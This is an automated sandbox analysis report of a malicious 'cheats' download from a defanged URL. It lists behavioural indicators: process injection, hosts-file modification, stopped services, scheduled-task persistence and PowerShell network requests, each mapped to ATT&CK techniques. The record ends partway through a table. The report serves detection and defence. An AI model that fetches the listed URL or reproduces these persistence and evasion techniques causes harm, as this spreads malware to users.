hxxps://cheats4pro[.]com/file

Analysis

max time kernel
266s
max time network
229s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
13/10/2023, 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cheats4pro.com/file

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 4744 created 3224	4744	Updaters.exe	21
PID 4744 created 3224	4744	Updaters.exe	21
PID 4744 created 3224	4744	Updaters.exe	21
PID 4744 created 3224	4744	Updaters.exe	21

Blocklisted process makes network request 1 IoCs

flow	pid	Process
38	996	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	Updaters.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 23 IoCs

pid	Process
4816	C4PROsetup.exe
5076	C4PROsetup.exe
3048	C4PROsetup.exe
4880	C4PROsetup.exe
4944	C4PROsetup.exe
3068	Lglklaczv.exe
1588	C4PROsetup.exe
3456	C4.exe
1432	Lglklaczv.exe
4744	Updaters.exe
5060	Lglklaczv.exe
948	C4.exe
2984	C4.exe
636	Lglklaczv.exe
3068	Lglklaczv.exe
4552	Updaters.exe
1084	Updaters.exe
308	Lglklaczv.exe
1884	Lglklaczv.exe
5116	fodhelper.exe
4264	fodhelper.exe
3432	fodhelper.exe
4376	fodhelper.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 4816 set thread context of 5076	4816	C4PROsetup.exe	87
PID 3048 set thread context of 4944	3048	C4PROsetup.exe	96
PID 3068 set thread context of 1588	3068	Lglklaczv.exe	101
PID 1432 set thread context of 5060	1432	Lglklaczv.exe	109
PID 636 set thread context of 308	636	Lglklaczv.exe	120
PID 3068 set thread context of 1884	3068	Lglklaczv.exe	123
PID 5116 set thread context of 4264	5116	fodhelper.exe	137
PID 3432 set thread context of 4376	3432	fodhelper.exe	141

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\ChromeUpdate\Defender\SmartUpdater.exe	Updaters.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1352	sc.exe
3376	sc.exe
2588	sc.exe
1656	sc.exe
3048	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
660	schtasks.exe
4024	schtasks.exe
2392	schtasks.exe
3752	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{B1DFD83B-10AD-4D0D-B88A-42472AC7B1 = 340501d51efed901	browser_broker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 0009fcd41a11da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000b329e64fabada0b0ddbd63a574b9b2c76342ad4e8f33f7e018bc9ca17c0e92f15b53b022b0d04a68a374cb18ff4cad6fc1c341e07b9aefd0b27f	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{B1DFD83B-10AD-4D0D-B88A-42472AC7B1 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000033e10dd21efed90133e10dd21efed901d11928d21efed9015e7204000000000001000000000000000000000000000000e50114001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000078003100000000001f5741951100557365727300640009000400efbe724a0b5d1f5741952e000000320500000000010000000000000000003a00000000009b67d60055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d00320031003800310033000000140050003100000000001f57c39a100041646d696e003c0009000400efbe1f5741951f57c39a2e0000009a520100000001000000000000000000000000000000f39b2401410064006d0069006e000000140084003100000000004d57e6ad1100444f574e4c4f7e3100006c0009000400efbe1f5741954d57e6ad2e000000a25201000000010000000000000000004200000000002f16730044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018006a0032005e7204004d57e6ad2000433450524f537e312e52415200004e0009000400efbe4d57e6ad4d57e6ad2e0000007daf01000000060000000000000000000000000000002f16730043003400500052004f00730065007400750070002e0072006100720000001c0000005d0000001c000000010000001c00000034000000000000005c0000001800000003000000af94affb1000000057696e646f777300433a5c55736572735c41646d696e5c446f776e6c6f6164735c433450524f73657475702e726172000010000000050000a0ffffffff790100001c0000000b0000a090e24d373f126545916439c4925e467b7901000060000000030000a058000000000000007768787064646e6f000000000000000050fa11f3eb46174a88dad555f21b21a9036908d83248ee1195a9e65b0aff120050fa11f3eb46174a88dad555f21b21a9036908d83248ee1195a9e65b0aff1200d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003500340030003700300030003500340036002d0032003500350034003800320035003100360031002d0032003300340039003300360033003800320035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001a1ab9c2000000000000d01200000000000000000000000000000000	browser_broker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 39dac4c51efed901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0f66bdcb1efed901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = c19fd7cb1efed901	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 00b84e2d51fed901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 75df0ac81efed901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\C4PROsetup.rar.cbwyv7o.partial:Zone.Identifier	browser_broker.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
612	powershell.exe
996	powershell.exe
996	powershell.exe
612	powershell.exe
612	powershell.exe
996	powershell.exe
3048	C4PROsetup.exe
3048	C4PROsetup.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe
3416	powershell.exe
3836	powershell.exe
3416	powershell.exe
3836	powershell.exe
3416	powershell.exe
3836	powershell.exe
4744	Updaters.exe
4744	Updaters.exe
4804	powershell.exe
4804	powershell.exe
4804	powershell.exe
4744	Updaters.exe
4744	Updaters.exe
4744	Updaters.exe
4744	Updaters.exe
4744	Updaters.exe
4744	Updaters.exe
948	C4.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4400	MicrosoftEdgeCP.exe
4400	MicrosoftEdgeCP.exe
4400	MicrosoftEdgeCP.exe
4400	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3008	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3008	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3008	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4572	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4572	MicrosoftEdgeCP.exe
Token: SeRestorePrivilege	4092	7zG.exe
Token: 35	4092	7zG.exe
Token: SeSecurityPrivilege	4092	7zG.exe
Token: SeSecurityPrivilege	4092	7zG.exe
Token: SeDebugPrivilege	4816	C4PROsetup.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	612	powershell.exe
Token: SeDebugPrivilege	3048	C4PROsetup.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	3068	Lglklaczv.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	1432	Lglklaczv.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	636	Lglklaczv.exe
Token: SeDebugPrivilege	3068	Lglklaczv.exe
Token: SeIncreaseQuotaPrivilege	4804	powershell.exe
Token: SeSecurityPrivilege	4804	powershell.exe
Token: SeTakeOwnershipPrivilege	4804	powershell.exe
Token: SeLoadDriverPrivilege	4804	powershell.exe
Token: SeSystemProfilePrivilege	4804	powershell.exe
Token: SeSystemtimePrivilege	4804	powershell.exe
Token: SeProfSingleProcessPrivilege	4804	powershell.exe
Token: SeIncBasePriorityPrivilege	4804	powershell.exe
Token: SeCreatePagefilePrivilege	4804	powershell.exe
Token: SeBackupPrivilege	4804	powershell.exe
Token: SeRestorePrivilege	4804	powershell.exe
Token: SeShutdownPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeSystemEnvironmentPrivilege	4804	powershell.exe
Token: SeRemoteShutdownPrivilege	4804	powershell.exe
Token: SeUndockPrivilege	4804	powershell.exe
Token: SeManageVolumePrivilege	4804	powershell.exe
Token: 33	4804	powershell.exe
Token: 34	4804	powershell.exe
Token: 35	4804	powershell.exe
Token: 36	4804	powershell.exe
Token: SeDebugPrivilege	948	C4.exe
Token: SeDebugPrivilege	5116	fodhelper.exe
Token: SeDebugPrivilege	3432	fodhelper.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4092	7zG.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4604	MicrosoftEdge.exe
4400	MicrosoftEdgeCP.exe
3008	MicrosoftEdgeCP.exe
4400	MicrosoftEdgeCP.exe
3980	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4400 wrote to memory of 4432	4400	MicrosoftEdgeCP.exe	73
PID 4400 wrote to memory of 4432	4400	MicrosoftEdgeCP.exe	73
PID 4400 wrote to memory of 4432	4400	MicrosoftEdgeCP.exe	73
PID 4400 wrote to memory of 3904	4400	MicrosoftEdgeCP.exe	74
PID 4400 wrote to memory of 3904	4400	MicrosoftEdgeCP.exe	74
PID 4400 wrote to memory of 3904	4400	MicrosoftEdgeCP.exe	74
PID 4816 wrote to memory of 4588	4816	C4PROsetup.exe	85
PID 4816 wrote to memory of 4588	4816	C4PROsetup.exe	85
PID 4816 wrote to memory of 4588	4816	C4PROsetup.exe	85
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
PID 4816 wrote to memory of 5076	4816	C4PROsetup.exe	87
